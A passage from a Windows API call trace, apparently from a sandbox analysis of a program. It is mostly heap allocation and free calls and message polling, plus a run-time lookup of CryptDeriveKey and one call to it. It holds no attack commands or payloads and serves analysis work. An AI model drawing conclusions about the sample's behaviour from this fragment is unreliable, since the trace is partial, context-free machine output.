| out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0207.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.539] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0207.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.540] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.540] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0207.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0207.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.541] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0207.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.541] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.541] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.542] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.542] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.542] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.543] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.543] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.543] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.543] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0207.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9dc8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.547] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0207.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.548] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 